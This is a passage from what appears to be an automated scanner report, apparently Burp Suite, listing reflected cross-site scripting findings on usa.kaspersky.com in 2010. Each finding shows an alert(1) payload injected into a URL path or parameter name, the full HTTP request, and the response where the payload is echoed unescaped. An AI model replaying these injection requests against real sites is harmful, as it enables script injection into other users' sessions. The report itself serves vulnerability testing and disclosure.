Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:55:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687710"
Content-Type: text/html; charset=utf-8
Content-Length: 30301
Date: Sat, 18 Dec 2010 15:55:17 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/partners188c0"><script>alert(1)</script>1d8c6910a8d/technology-alliances-partnerships" />
...[SNIP]...

1.247. http://usa.kaspersky.com/partners/technology-alliances-partnerships [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /partners/technology-alliances-partnerships

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97d22"-alert(1)-"48dd8c4cf33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partners/technology-alliances-partnerships97d22"-alert(1)-"48dd8c4cf33 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:58:57 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687937"
Content-Type: text/html; charset=utf-8
Content-Length: 30204
Date: Sat, 18 Dec 2010 15:59:03 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/partners/technology-alliances-partnerships97d22"-alert(1)-"48dd8c4cf33";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.248. http://usa.kaspersky.com/partners/technology-alliances-partnerships [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /partners/technology-alliances-partnerships

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24239"><script>alert(1)</script>1d35292b42d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partners/technology-alliances-partnerships24239"><script>alert(1)</script>1d35292b42d HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:58:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687916"
Content-Type: text/html; charset=utf-8
Content-Length: 30300
Date: Sat, 18 Dec 2010 15:58:43 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/partners/technology-alliances-partnerships24239"><script>alert(1)</script>1d35292b42d" />
...[SNIP]...

1.249. http://usa.kaspersky.com/partners/technology-alliances-partnerships [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /partners/technology-alliances-partnerships

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95f27"><script>alert(1)</script>2495e97b848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partners/technology-alliances-partnerships?95f27"><script>alert(1)</script>2495e97b848=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:52:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687576"
Content-Type: text/html; charset=utf-8
Content-Length: 33701
Date: Sat, 18 Dec 2010 15:53:06 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/partners/technology-alliances-partnerships?95f27"><script>alert(1)</script>2495e97b848=1" />
...[SNIP]...

1.250. http://usa.kaspersky.com/products-services [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42392"-alert(1)-"d79acec1a75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services42392"-alert(1)-"d79acec1a75 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:00:37 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688037"
Content-Type: text/html; charset=utf-8
Content-Length: 30053
Date: Sat, 18 Dec 2010 16:00:46 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services42392"-alert(1)-"d79acec1a75";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.251. http://usa.kaspersky.com/products-services [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 524a3"><script>alert(1)</script>c89b41bea93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services524a3"><script>alert(1)</script>c89b41bea93 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:00:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688009"
Content-Type: text/html; charset=utf-8
Content-Length: 30151
Date: Sat, 18 Dec 2010 16:00:17 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services524a3"><script>alert(1)</script>c89b41bea93" />
...[SNIP]...

1.252. http://usa.kaspersky.com/products-services [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e0c8"><script>alert(1)</script>d44010b26da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services?2e0c8"><script>alert(1)</script>d44010b26da=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:57:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687843"
Content-Type: text/html; charset=utf-8
Content-Length: 33913
Date: Sat, 18 Dec 2010 15:57:32 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services?2e0c8"><script>alert(1)</script>d44010b26da=1" />
...[SNIP]...

1.253. http://usa.kaspersky.com/products-services/business-security [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business-security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f607"><script>alert(1)</script>4f81da5344e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services7f607"><script>alert(1)</script>4f81da5344e/business-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:01:26 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688086"
Content-Type: text/html; charset=utf-8
Content-Length: 31597
Date: Sat, 18 Dec 2010 16:01:32 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services7f607"><script>alert(1)</script>4f81da5344e/business-security" />
...[SNIP]...

1.254. http://usa.kaspersky.com/products-services/business-security [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business-security

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0ed9"-alert(1)-"9b6c198d3c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-servicesf0ed9"-alert(1)-"9b6c198d3c9/business-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:01:47 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688107"
Content-Type: text/html; charset=utf-8
Content-Length: 31465
Date: Sat, 18 Dec 2010 16:01:54 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-servicesf0ed9"-alert(1)-"9b6c198d3c9/business-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.255. http://usa.kaspersky.com/products-services/business-security [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business-security

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 765f7"-alert(1)-"3a10ac301d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services/business-security765f7"-alert(1)-"3a10ac301d HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:04:02 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688242"
Content-Type: text/html; charset=utf-8
Content-Length: 31309
Date: Sat, 18 Dec 2010 16:04:08 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/business-security765f7"-alert(1)-"3a10ac301d";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.256. http://usa.kaspersky.com/products-services/business-security [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business-security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ddce"><script>alert(1)</script>0d5a481aa77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/business-security2ddce"><script>alert(1)</script>0d5a481aa77 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:03:34 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688214"
Content-Type: text/html; charset=utf-8
Content-Length: 31536
Date: Sat, 18 Dec 2010 16:03:41 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/business-security2ddce"><script>alert(1)</script>0d5a481aa77" />
...[SNIP]...

1.257. http://usa.kaspersky.com/products-services/business-security [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business-security

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 114c9"><script>alert(1)</script>8858c9703bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/business-security?114c9"><script>alert(1)</script>8858c9703bb=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:58:16 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687896"
Content-Type: text/html; charset=utf-8
Content-Length: 41467
Date: Sat, 18 Dec 2010 15:58:31 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/business-security?114c9"><script>alert(1)</script>8858c9703bb=1" />
...[SNIP]...

1.258. http://usa.kaspersky.com/products-services/business/kaspersky-open-space-security [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business/kaspersky-open-space-security

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9eee0"-alert(1)-"85d74bfbd1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services9eee0"-alert(1)-"85d74bfbd1d/business/kaspersky-open-space-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:01:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688116"
Content-Type: text/html; charset=utf-8
Content-Length: 39582
Date: Sat, 18 Dec 2010 16:02:06 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services9eee0"-alert(1)-"85d74bfbd1d/business/kaspersky-open-space-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.259. http://usa.kaspersky.com/products-services/business/kaspersky-open-space-security [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business/kaspersky-open-space-security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e531"><script>alert(1)</script>2e971b4bb0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services2e531"><script>alert(1)</script>2e971b4bb0c/business/kaspersky-open-space-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:01:33 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688093"
Content-Type: text/html; charset=utf-8
Content-Length: 32796
Date: Sat, 18 Dec 2010 16:01:40 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
